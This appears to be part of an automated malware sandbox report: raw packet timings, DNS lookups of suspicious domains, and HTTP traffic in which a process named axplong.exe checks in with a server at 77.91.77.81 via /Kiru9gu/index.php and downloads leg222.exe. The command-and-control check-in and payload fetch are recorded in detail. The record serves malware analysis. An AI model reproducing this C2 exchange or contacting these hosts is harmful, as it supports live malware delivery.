                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147461891 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147474051 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147489071 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147504091 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147517920 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147531986 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147557020 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147557974 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.147589922 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225707054 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225756884 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225792885 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225826025 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225860119 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225892067 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225924969 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225956917 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.225991011 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226022959 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226054907 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226064920 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226064920 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226066113 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226066113 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226066113 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226066113 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226066113 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226090908 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.226174116 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.228954077 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229010105 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229043007 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229073048 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229073048 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229093075 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229129076 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229147911 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229163885 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229197979 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229214907 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229249001 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229278088 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229310989 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229327917 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229343891 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229350090 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229377985 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229397058 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229410887 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229418993 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229444981 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229477882 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229491949 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229631901 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229796886 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229852915 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229876041 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229926109 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229960918 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229970932 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.229994059 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.230026960 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.230058908 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.230077028 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.230092049 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.230137110 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231272936 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231326103 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231374979 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231408119 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231439114 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231441021 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231441021 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231466055 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231491089 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231540918 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231540918 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231575966 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231623888 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231657028 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231672049 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231704950 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231755018 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231769085 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231769085 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231787920 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231822014 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231837034 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231853962 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231908083 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231940031 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231956005 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.231972933 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232004881 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232018948 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232053995 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232088089 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232121944 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232136965 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232153893 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232187986 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232213020 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232220888 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232254028 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232268095 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232285976 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232335091 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232340097 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232367992 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232384920 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232400894 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232418060 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232436895 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232512951 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232546091 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232559919 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232559919 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232578993 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232582092 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232611895 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232624054 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232645988 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232677937 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232691050 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232712030 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232743979 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232777119 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232783079 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232811928 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232811928 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232827902 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232863903 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232897997 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232925892 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232930899 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232964039 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.232996941 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233011007 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233030081 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233063936 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233095884 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233109951 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233130932 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233161926 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233176947 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233270884 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233303070 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233352900 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233355999 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233381987 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233429909 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233431101 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233464003 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233491898 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233540058 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233540058 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233541965 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233575106 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233606100 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233637094 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233638048 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233686924 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233689070 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233738899 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233771086 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233803034 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233819008 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233835936 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233867884 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233880997 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233901024 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233937025 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233968019 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.233968973 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.234002113 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.234035015 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.234049082 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.234067917 CEST88885898543.153.49.49192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:10.234087944 CEST589858888192.168.2.543.153.49.49
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:07.325249910 CEST192.168.2.51.1.1.10x2161Standard query (0)bflow-musico.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.792083979 CEST192.168.2.51.1.1.10x8aa4Standard query (0)foodbook.liveA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.984394073 CEST192.168.2.51.1.1.10xdabbStandard query (0)tmpfiles.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:35.865957022 CEST192.168.2.51.1.1.10x7792Standard query (0)api.proxyscrape.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:08.277237892 CEST1.1.1.1192.168.2.50x17eeNo error (0)windowsupdatebg.s.llnwi.net87.248.205.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:07.337424040 CEST1.1.1.1192.168.2.50x2161No error (0)bflow-musico.fun188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:07.337424040 CEST1.1.1.1192.168.2.50x2161No error (0)bflow-musico.fun188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:09.364046097 CEST1.1.1.1192.168.2.50x636fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:09.364046097 CEST1.1.1.1192.168.2.50x636fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.952982903 CEST1.1.1.1192.168.2.50x8aa4No error (0)foodbook.live15.235.80.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.994653940 CEST1.1.1.1192.168.2.50xdabbNo error (0)tmpfiles.org104.21.21.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:34.994653940 CEST1.1.1.1192.168.2.50xdabbNo error (0)tmpfiles.org172.67.195.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:35.876626968 CEST1.1.1.1192.168.2.50x7792No error (0)api.proxyscrape.com104.18.11.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:35.876626968 CEST1.1.1.1192.168.2.50x7792No error (0)api.proxyscrape.com104.18.10.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.54970477.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:01.501384020 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.228634119 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:06:02 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.243724108 CEST306OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 31 34 32 43 41 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CDF1A142CAFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.494731903 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:06:02 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 37 37 0d 0a 20 3c 63 3e 31 30 30 30 31 36 30 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 39 66 32 34 63 35 33 66 35 38 33 35 61 37 65 66 31 38 62 31 36 66 39 34 38 38 38 37 35 39 62 65 32 61 36 65 64 32 34 61 65 61 66 61 38 66 64 34 66 37 33 65 62 23 31 30 30 30 31 39 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 62 36 37 65 64 38 32 31 33 66 38 31 36 64 63 32 63 64 30 61 65 61 65 65 36 36 65 66 38 66 34 65 38 62 36 34 39 37 66 65 31 66 36 37 66 33 63 37 35 64 30 37 32 39 37 30 66 38 38 65 61 32 37 62 39 38 37 61 63 23 31 30 30 30 31 39 33 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 62 36 37 65 64 38 32 31 33 66 38 31 36 64 63 32 63 64 30 61 65 61 65 65 36 36 65 66 38 66 34 65 38 62 36 34 39 37 66 65 31 66 36 37 66 33 63 36 35 64 61 36 38 63 31 30 39 38 66 61 66 33 62 65 65 64 31 61 63 65 65 31 33 23 31 30 30 30 32 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: 477 <c>1000160001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2a6ed24aeafa8fd4f73eb#1000192001+++aa0ed36554e19fbffd5744f69c5b67ed8213f816dc2cd0aeaee66ef8f4e8b6497fe1f67f3c75d072970f88ea27b987ac#1000193001+++aa0ed36554e19fbffd5744f69c5b67ed8213f816dc2cd0aeaee66ef8f4e8b6497fe1f67f3c65da68c1098faf3beed1acee13#1000202001+++aa0ed36554e19fb9f24c58f79f437dee9d16e714c2779ebfaded6cf4f8f6bf4525ebfc63#1000210001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2a8fd2af0f9abe51c3db8aa636b77#1000219001+++aa0ed36554e19fbaf64c5bf19e437de69d13ef1ed523c7f5e5ec2cebf3b5e25b5cece2325161da74c14f92bc71b9#1000226001+++aa0ed36554e19fbffd5744f59a5f67ee811ff815dc2dd08bb8ed30f4ffefba466fa0e17e76#1000227001+++aa0ed36554e19fbffd5744f69c5b67ed8213f816dc2cd0aeaee66ef8f4e8b6497fe1f67f3c61da7bdd5fc4bc#1000238001+++aa0ed3651df49fa1b10f1aa2c4012cac9d48a443c27f93e2f3b877aeada9e30564f8f6607f65917b8b5f#1000240001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2a4ed34efe9fba15e25ebfc63#1000241001+++aa0ed36554e19fb9f24c58f79f43 [TRUNCATED]
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.494786978 CEST98INData Raw: 32 34 33 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 39 66 32 34 63 35 38 66 37 39 66 34 33 37 64 65 65 39 64 31 36 65 37 31 34 63 32 37 37 39 65 62 66 61 64 65 64 36 63 63 36 66 35 66 62 61 31 34 31 34 39 63 31 64 30 32 38 37
                                                                                                                                                                                                                                        Data Ascii: 243001+++aa0ed36554e19fb9f24c58f79f437dee9d16e714c2779ebfaded6cc6f5fba14149c1d028766ada#<d>0
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.496480942 CEST52OUTGET /lend/leg222.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718650103 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:06:02 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 1143296
